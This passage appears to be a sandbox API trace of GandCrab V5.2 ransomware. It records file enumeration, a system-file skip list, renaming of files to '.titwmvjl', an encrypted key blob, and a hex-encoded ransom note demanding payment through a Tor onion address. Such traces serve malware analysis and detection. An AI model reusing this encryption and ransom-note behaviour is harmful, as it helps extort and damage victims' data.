8\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.956] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0072.957] CloseHandle (hObject=0x2bc) returned 1 [0072.957] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.957] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.957] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x115)) [0072.957] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.957] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.957] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.958] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a09d2ca4deb61a.lock") returned 78 [0072.958] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\proof\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0072.958] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.959] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.959] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\") returned 54 [0072.959] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\*" [0072.959] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503938 [0072.959] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.959] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.959] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.959] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.959] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.959] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.959] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a09d2ca4deb61a.lock" [0072.959] lstrlenW (lpString=".titwmvjl") returned 9 [0072.959] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a09d2ca4deb61a.lock") returned 78 [0072.959] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.959] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 87 [0072.959] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a09d2ca4deb61a.lock") returned 78 [0072.959] lstrlenW (lpString=".lock") returned 5 [0072.959] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.960] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.960] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.960] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.960] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.960] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.960] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.960] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\TITWMVJL-DECRYPT.txt" [0072.960] lstrlenW (lpString=".titwmvjl") returned 9 [0072.960] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\TITWMVJL-DECRYPT.txt") returned 74 [0072.960] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.960] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 83 [0072.960] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\TITWMVJL-DECRYPT.txt") returned 74 [0072.960] lstrlenW (lpString=".txt") returned 4 [0072.960] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.961] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.961] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.961] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.961] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\TITWMVJL-DECRYPT.txt") returned 74 [0072.961] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\TITWMVJL-DECRYPT.txt") returned 74 [0072.961] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.961] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.961] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.961] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.961] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.961] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.961] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.961] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.961] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.961] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0072.961] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0072.961] CloseHandle (hObject=0x2bc) returned 1 [0072.961] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0072.962] lstrcmpW (lpString1="Protect", lpString2=".") returned 1 [0072.962] lstrcmpW (lpString1="Protect", lpString2="..") returned 1 [0072.962] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Protect" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect" [0072.962] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\" [0072.962] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.962] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.962] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.962] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.962] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.962] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.962] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.962] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.963] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.963] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.963] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.963] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\\\TITWMVJL-DECRYPT.txt") returned 77 [0072.963] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0072.972] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x